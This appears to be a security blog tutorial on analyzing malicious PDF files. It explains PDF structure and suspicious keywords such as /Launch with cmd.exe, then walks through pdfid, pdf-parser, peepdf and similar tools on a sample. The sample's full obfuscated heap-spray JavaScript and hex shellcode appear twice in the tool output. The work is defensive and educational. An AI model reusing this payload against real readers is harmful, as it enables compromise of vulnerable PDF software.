Analyzing Malicious PDFs

PDF files are very commonly used to share documents. Because of the many vulnerabilities reported in PDF reading software, they are also commonly used by attackers for client-side attacks.

The point to note is that a PDF containing malware needs vulnerable software for a successful exploit.

A quick tour of the structure of a PDF file:-

  • header - contains the version number of the PDF file.
  • body - contains objects like streams/images/media etc., basically the document data in chunks distinguished by content and data type.
  • xref - cross reference table, which gives the location of each object as a byte count from the beginning of the file (called the offset).
  • trailer - tells the PDF reading software how to read the file. PDF readers start reading a pdf file from the trailer section, at the end of the file. It also provides the offset of the xref table, after the keyword startxref.

Incremental updates can be made to a pdf file, for example when adding new content or a signature. In such a case, a new body + xref + trailer is appended to the existing file, and the new trailer keeps a pointer (/Prev) to the previous xref table.
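As a rough illustration of the layout above, here is a minimal Python sketch that reads the header version, collects every startxref offset and counts the %%EOF markers. The function name pdf_layout and the sample bytes are made up for this example, and a regex scan is only an approximation of real parsing. More than one %%EOF usually hints at an incremental update, though linearized files typically carry two as well.

```python
import re

def pdf_layout(data: bytes) -> dict:
    """Summarise the header version, startxref offsets and %%EOF markers."""
    header = re.match(rb"%PDF-(\d\.\d)", data)
    offsets = [int(m.group(1)) for m in re.finditer(rb"startxref\s+(\d+)", data)]
    return {
        "version": header.group(1).decode() if header else None,
        "startxref_offsets": offsets,
        "eof_markers": data.count(b"%%EOF"),
    }

# Hypothetical file skeleton: an original revision plus one appended update.
sample = (b"%PDF-1.7\n1 0 obj\n<< >>\nendobj\n"
          b"startxref\n116\n%%EOF\n"
          b"2 0 obj\n<< >>\nendobj\n"
          b"startxref\n300\n%%EOF\n")
layout = pdf_layout(sample)
print(layout)
```

On a real file, read the bytes with open(path, "rb").read() and pass them in.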

Some PDF data types:-

  • Boolean - true/false
  • Numbers - integers or reals with an optional leading sign +/-, eg. +12, -3.5
  • Names - starts with '/', eg /Danny
  • Strings - series of bytes surrounded by parentheses (data) or angle brackets <data>. Data can contain ASCII/hexadecimal/octal: strings in angle brackets are hexadecimal, and octal data inside parentheses is prefixed with '\', eg. \101.
  • Arrays - sequence of objects enclosed within '[' and ']'
  • Dictionaries - contain key-value pairs, where the key is a name and the value can be any object, enclosed within << and >>
  • Streams - sequence of bytes, usually for images and other big data blocks, enclosed within 'stream' and 'endstream'. A stream is accompanied by a stream dictionary, which contains details about the stream.
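To make the two string notations concrete, here is a small Python sketch that decodes a hexadecimal string and the octal escapes of a literal string. Both function names are hypothetical, and the literal decoder deliberately handles only \ddd octal escapes, not the other backslash escapes a real parser must support.

```python
import re

def decode_hex_string(token: str) -> bytes:
    """Decode a <...> hexadecimal string; whitespace inside is ignored."""
    digits = "".join(token.strip("<>").split())
    if len(digits) % 2:
        digits += "0"  # a missing final digit is treated as 0
    return bytes.fromhex(digits)

def decode_octal_escapes(token: str) -> bytes:
    """Decode \\ddd octal escapes inside a (...) literal string."""
    inner = token[1:-1].encode("latin-1")  # drop the surrounding parentheses
    return re.sub(rb"\\([0-7]{1,3})",
                  lambda m: bytes([int(m.group(1), 8) & 0xFF]), inner)

hex_form = decode_hex_string("<636d64>")
octal_form = decode_octal_escapes(r"(\143\155\144.exe)")
print(hex_form, octal_form)
```

Attackers often mix these notations so that a plain text search for a file name or keyword misses it.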

Note:-

  • /Filter - says the stream content is encoded using the mentioned algorithm, eg. /FlateDecode
  • /JS 110 0 R - implies run the javascript stored in object 110 (generation 0). R stands for reference.
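/FlateDecode is the filter seen most often, and it corresponds to zlib/deflate compression. The following is a minimal sketch, assuming plain zlib data with no predictor and no chained filters; the function name inflate_streams and the sample object are hypothetical, and the regex is far looser than a real parser.

```python
import re
import zlib

# Non-greedy match of everything between the stream keywords.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)

def inflate_streams(pdf_bytes: bytes) -> list:
    """Return the inflated content of each stream, or None where inflating fails."""
    results = []
    for match in STREAM_RE.finditer(pdf_bytes):
        try:
            # decompressobj tolerates the end-of-line left before 'endstream'.
            results.append(zlib.decompressobj().decompress(match.group(1)))
        except zlib.error:
            results.append(None)
    return results

# Hypothetical object carrying a deflated script.
payload = zlib.compress(b"app.alert(1);")
sample = (b"1 0 obj\n<< /Filter /FlateDecode /Length %d >>\nstream\n" % len(payload)
          + payload + b"\nendstream\nendobj\n")
inflated = inflate_streams(sample)
print(inflated)
```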

More at PDF File Format, Adobe

Without going into too much detail, let's get to the real deal.

Attack Vectors

What should you typically look out for in a malicious pdf file?

  • JavaScript code, usually obfuscated
  • Shellcode, usually hexadecimal
  • Launching an application in the background
  • Downloading malware from a URL and running it
  • Embedded flash running ActionScript

Where to look?

  • Launch Action
/Type /Action 
/S /Launch
<</F(cmd.exe)>>
  • JavaScript - /JS or /JavaScript
  • /OpenAction and /AA tell the reader to run a script or action automatically
  • /Names, /AcroForm or /Action can launch a script/action too
  • /GoTo - changes the view to a destination within the file or in another pdf file
  • /URI - calls a url
  • /SubmitForm and /GoToR can send data to a URL
  • /RichMedia can imply the presence of a flash file
  • /ObjStm - object stream; objects can be hidden here

Is this comprehensive? Nope! Malicious code could be hidden anywhere.
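A first pass over these keywords can be sketched in a few lines of Python. This is only an illustration: the names KEYWORDS, normalize_names and count_keywords are made up here, the scan sees only what sits outside compressed streams (so anything hidden in an /ObjStm is missed), and undoing #xx escapes across the whole file is a shortcut a real parser would not take.

```python
import re
from collections import Counter

# Keywords taken from the list above; extend as needed.
KEYWORDS = [b"/JS", b"/JavaScript", b"/OpenAction", b"/AA", b"/Launch",
            b"/AcroForm", b"/URI", b"/SubmitForm", b"/GoToR",
            b"/RichMedia", b"/ObjStm"]

def normalize_names(data: bytes) -> bytes:
    """Undo #xx hex escapes, which can disguise names (eg. /J#61vaScript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def count_keywords(data: bytes) -> Counter:
    data = normalize_names(data)
    counts = Counter()
    for keyword in KEYWORDS:
        # Reject longer names that merely start with the keyword.
        pattern = re.escape(keyword) + rb"(?![A-Za-z0-9])"
        counts[keyword.decode()] = len(re.findall(pattern, data))
    return counts

sample = b"<< /S /J#61vaScript /JS 10 0 R >> << /OpenAction 5 0 R >>"
counts = count_keywords(sample)
print({name: hits for name, hits in counts.items() if hits})
```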

Here are some tools to make life easy.

AnalyzePDF

A no-brainer: just point it at a file and shoot.

$  AnalyzePDF.py  malware1.pdf 

===================================
[+] Analyzing: malware1.pdf
-----------------------------------
[-] Sha256: 27cced58a0fcbb0bbe3894f74d3014611039fefdf3bd2b0ba7ad85b18194cffa
[-] JavaScript count.......: 2
	[*] That's a lot of js ...
[-] AcroForm...............: 2
[-] Total Entropy..........: 2.040198
[-] Entropy inside streams : 1.737587
[-] Entropy outside streams: 5.179112
	[*] Entropy of outside stream is questionable:
	[-] Outside (5.179112) +2 (7.179112) > Total (2.040198)
	[*] LOW entropy detected:
	[-] Total (2.0) or Inside (1.7) <= 2.0
[-] YARA hit(s): [embedded_exe]
-----------------------------------
[-] Total YARA score.......: 0
[-] Total severity score...: 3
[-] Overall score..........: 3
===================================
[!] MEDIUM probability of being malicious

 $  AnalyzePDF.py  malware3.pdf 

===================================
[+] Analyzing: malware3.pdf
-----------------------------------
[-] Sha256: bd2776e507cf0284a9cfb7deb9a241d6699243a221c125f9911fa753ca8f01d1
[-] Total Entropy..........: 7.982258
[-] Entropy inside streams : 7.983942
[-] Entropy outside streams: 5.399691
[-] (1) page PDF
-----------------------------------
[-] Total YARA score.......: 0
[-] Total severity score...: 0
[-] Overall score..........: 0
===================================
[-] Scanning didn't determine anything warranting suspicion

malware1.pdf is shown to have 2 javascripts and 2 acroforms, and its probability of being malicious is rated medium.
But malware3.pdf did not raise any suspicion. Let's take a deeper look at that file.
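The entropy figures in the reports above are presumably Shannon entropy in bits per byte, ranging from 0 to 8; that is an assumption about the tool rather than something confirmed here. Under that assumption, a minimal Python sketch of the measurement looks like this (the function name is hypothetical):

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

low = shannon_entropy(b"\x0c" * 4096)         # one repeated byte value
high = shannon_entropy(bytes(range(256)) * 16)  # every byte value equally often
print(low, high)
```

Compressed or encrypted data sits close to 8, while long runs of a repeated filler byte pull the value towards 0.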

pdfid and pdf-parser

pdfid provides a summary of the objects and suspicious keywords in the file. pdf-parser can then be used to take a look at each object.

 $  pdfid.py   malware3.pdf   
PDFiD 0.2.1 malware3.pdf
 PDF Header: %PDF-1.7
 obj                   17
 endobj                17
 stream                14
 endstream             14
 xref                   0
 trailer                0
 startxref              2
 /Page                  1
 /Encrypt               0
 /ObjStm                3
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0

Let's take a look at the objects, starting with the ObjStms.

$  pdf-parser.py  --search  objstm   malware3.pdf  
obj 15 0
 Type: /ObjStm
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /First 99
    /Length 511
    /N 15
    /Type /ObjStm
  >>


obj 3 0
 Type: /ObjStm
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /First 4
    /Length 49
    /N 1
    /Type /ObjStm
  >>


obj 4 0
 Type: /ObjStm
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /First 4
    /Length 125
    /N 1
    /Type /ObjStm
  >>

There are 3 object streams, with ids 15, 3 and 4. We can look into each one as follows:-


 $  pdf-parser.py -o  15 -wf   malware3.pdf  
obj 15 0
 Type: /ObjStm
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /First 99
    /Length 511
    /N 15
    /Type /ObjStm
  >>

 19 0 20 22 21 44 22 71 23 79 24 512 25 545 26 585 27 620 28 628 29 659 30 715 31 734 32 745 33 781 <</JavaScript 20 0 R>><</Names[(tt)21 0 R]>><</JS 10 0 R/S/JavaScript>>[23 0 R]<</AP<</N 12 0 R>>/BS<</S/S/Type/Border/W 0>>/Border[0 0 0]/F 68/NM(RM1)/P 11 0 R/Rect[60.307 50.5217 61.307 51.5217]/RichMediaContent 25 0 R/RichMediaSettings<</Activation<</Condition/PV/Configuration 26 0 R/Presentation<</NavigationPane false/PassContextClick false/Style/Embedded/Toolbar false/Transparent false>>/Type/RichMediaActivation>>/Deactivation<</Condition/XD/Type/RichMediaDeactivation>>>>/Subtype/RichMedia/Type/Annot>><</CA 1.0/Type/ExtGState/ca 1.0>><</Assets 32 0 R/Configurations 33 0 R>><</Instances 27 0 R/Subtype/Flash>>[28 0 R]<</Asset 29 0 R/Params 30 0 R>><</EF<</F 1 0 R>>/F(pad.swf)/Type/Filespec/UF(pad.swf)>><</Binding 31 0 R>>/Background<</Names[(pad.swf)29 0 R]>>[26 0 R]

The interesting objects referenced here are 20, 21, 10, 23 and 12. Also, note the embedded flash file, pad.swf.
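The run of numbers at the start of the decoded stream is its index: /N pairs of object number and offset, with the offsets counted from the /First byte. A minimal Python sketch of splitting such a stream, using a shortened sample built from the first four objects in the output above (the function name is hypothetical):

```python
def split_object_stream(decoded: bytes, n: int, first: int) -> dict:
    """Split a decoded /ObjStm payload into {object number: raw object bytes}."""
    # The first `first` bytes hold n pairs: object number, offset into the body.
    fields = decoded[:first].split()
    pairs = [(int(fields[2 * i]), int(fields[2 * i + 1])) for i in range(n)]
    body = decoded[first:]
    objects = {}
    for idx, (number, offset) in enumerate(pairs):
        # An object runs until the next object's offset, or to the end of the body.
        end = pairs[idx + 1][1] if idx + 1 < n else len(body)
        objects[number] = body[offset:end].strip()
    return objects

# Shortened sample: index and bodies of objects 19 to 22 only.
header = b"19 0 20 22 21 44 22 71 "
body = (b"<</JavaScript 20 0 R>><</Names[(tt)21 0 R]>>"
        b"<</JS 10 0 R/S/JavaScript>>[23 0 R]")
objects = split_object_stream(header + body, n=4, first=len(header))
for number, raw in objects.items():
    print(number, raw.decode())
```

Splitting the stream this way makes it clear that the /JS reference to object 10 belongs to object 21.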

...
 $  pdf-parser.py -o  10  -wf   malware3.pdf  
obj 10 0
 Type: 
 Referencing: 
 Contains stream

  <<
    /Filter [/FlateDecode]
    /Length 1101
  >>

 var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
c = p(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e657890
00006aff6a57ff9044"));
b += c;
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();


Hurray! We got the suspicious payload. The script sprays the heap with 0c0c0c0c filler, and the long hex string appears to be shellcode.

Next, extract the flash file from the pdf using swf_mastah.py, and look for ActionScript using flare.

 $  swf_mastah.py -o swf3  -f  malware3.pdf 
 $ 
 $  flare  swf31_decoded_object.swf
 $
 $  cat swf31_decoded_object.flr 
movie 'swf31_decoded_object.swf' {
// flash 9, total frames: 1, frame rate: 31 fps, 550x180 px, compressed
  
  // unknown tag 86 length 11

  movieClip 3  {
  }

  movieClip 4  {
  ...

Nothing further here.

pdfxray_lite

Gives a good overview of the pdf file, as an HTML report with the details of every object.

 $  pdfxray_lite.py  -r report3_ -f malware3.pdf  
721601bdbec57cb103a9717eeef0bfca
 $  firefox report3_721601bdbec57cb103a9717eeef0bfca_report.html

HTML report

jsunpack-n

A tool that can extract javascript and shellcode from a file, sniffed network traffic, a pcap file or a url.

 $  ./jsunpackn.py   malware3.pdf   
[malicious:7] [PDF] malware3.pdf
	suspicious: Warning detected //warning CVE-NO-MATCH Shellcode NOP len 65527 //warning CVE-NO-MATCH Shellcode NOP len 67045 //warning CVE-NO-MATCH Shellcode NOP len 516197 //warning CVE-NO-MATCH Shellcode NOP len 514140 //warning CVE-NO-MATCH Shellcode NOP len 9482
	malicious: shellcode of length 991/67562
	malicious: shellcode of length 1357/524288
	malicious: shellcode of length 1356/522228
	malicious: shellcode of length 993/259026079
	file: decoding_e23548afdb2fe9c5e123033df92883614d1bbbd9: 4122 bytes
	file: decoding_f2cb524f74328b57eb7d831e12ddb3c1dbd3a1e3: 98824 bytes
	file: shellcode_4bad40f2f45867b0875d8ab1ed4ef422c2b10c67: 991 bytes
	file: shellcode_7c0cac691d5453f6ee5412b4229c71f2f8bfdceb: 1357 bytes
	file: shellcode_f7e8dbe54d1d158a41344a40ffaf4cd54b2c6423: 1356 bytes
	file: shellcode_b72262be25c5dc1c1ad6b886bd5a40940c8c76b0: 993 bytes
	file: original_11d2f8d754f3e52893c631f0201b72c909d52cd8: 268333 bytes

$ ls temp/files
...  

peepdf

Probably the best tool, with almost everything needed to assess a pdf file.

 $  peepdf.py    -f malware3.pdf    
File: malware3.pdf
MD5: 721601bdbec57cb103a9717eeef0bfca
SHA1: 11d2f8d754f3e52893c631f0201b72c909d52cd8
Size: 268333 bytes
Version: 1.7
Binary: True
Linearized: True
Encrypted: False
Updates: 1
Objects: 34
Streams: 14
Comments: 0
Errors: 0

Version 0:
	Catalog: 9
	Info: 7
	Objects (2): [8, 18]
	Streams (1): [18]
		Xref streams (1): [18]
		Encoded (1): [18]

Version 1:
	Catalog: 9
	Info: 7
	Objects (32): [1, 2, 3, 4, 5, 6, 7, 9, 10, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34]
	Compressed objects (17): [32, 33, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 6, 7]
		Errors (1): [17]
	Streams (13): [34, 10, 12, 13, 14, 15, 16, 17, 1, 2, 3, 4, 5]
		Xref streams (1): [5]
		Object streams (3): [15, 3, 4]
		Encoded (9): [34, 10, 12, 13, 15, 17, 3, 4, 5]
		Decoding errors (1): [17]
	Objects with JS code (1): [10]
	Suspicious elements:
		/Names: [9, 32, 20]
		/JS: [15, 21]
		/JavaScript: [15, 19, 21]



One can start with the suspicious elements, and then look at the interesting objects using interactive mode.

 $  peepdf.py  -i    -f malware3.pdf    
File: malware3.pdf

...

PPDF> object   10  

<< /Length 1101
/Filter [ /FlateDecode ] >>
stream
var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
c = p(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e657890
00006aff6a57ff9044"));
b += c;
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();
endstream


PPDF> js_code 10 

var p = unescape;
var len = "length";

function a(__) {
    var _ = '';
    for (var ___ = 0; ___ < __[len]; ___ += 4) _ += '%' + 'u' + __.substr(___, 4);
    return _;
}
var sb = "uismhtsmfvotro,[svystr,ptpmd";

function s() {
    c = p(a("0c0c0c0c"));
    while (c[len] + 20 + 8 < 0x10000) c = c + c;
    b = c["substring"](0, (0x0c0c - 0x24) / 2);
    b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e65
789000006aff6a57ff9044"));
    b += c;
    d = b["substring"](0, 0x10000 / 2);
    while (d[len] < 0x80000) d += d;
    _3 = d["substring"](0, 0x80000 - (0x1020 - 0x08) / 2);
    _4 = new Array();
    for (i = 0; i < 0x1f0; i = i + 1) _4[i] = _3 + "s";
}
s();


Some quick commands:-

info - gives an overview of the file
object <objectid> - dumps the object, decoded if it is encoded
rawobject <objectid> - dumps the raw data, as is
js_code <objectid> - shows the javascript code in readable form

Origami

Provides a Ruby library for working with pdf files. Read the online Ruby documentation for further details.

I encountered this little bug, while fiddling with pdfsh (which uses origami) on remnux.

$ pdfsh  
load error: /var/lib/gems/1.9.1/gems/origami-1.2.7/bin/shell/.irbrc
NameError: uninitialized constant Ref::SoftReference::Monitor
	/var/lib/gems/1.9.1/gems/ref-2.0.0/lib/ref/soft_reference.rb:26:in `<class:SoftReference>'
	/var/lib/gems/1.9.1/gems/ref-2.0.0/lib/ref/soft_reference.rb:19:in `<module:Ref>'
	/var/lib/gems/1.9.1/gems/ref-2.0.0/lib/ref/soft_reference.rb:1:in `<top (required)>'

The fix is a single line, require 'monitor', added before the Monitor is created:

/var/lib/gems/1.9.1/gems/ref-2.0.0/lib/ref/soft_reference.rb
...
 24     MIN_GC_CYCLES = 10
 25     require 'monitor'
 26     @@lock = Monitor.new
...

Defence

  • Keep your PDF reading software updated
  • Avoid reading PDFs in the browser, or disable JavaScript
  • Do not allow PDFs to execute external applications

Dinesh Gunasekar - | Tags : PDF, JavaScript, ShellCode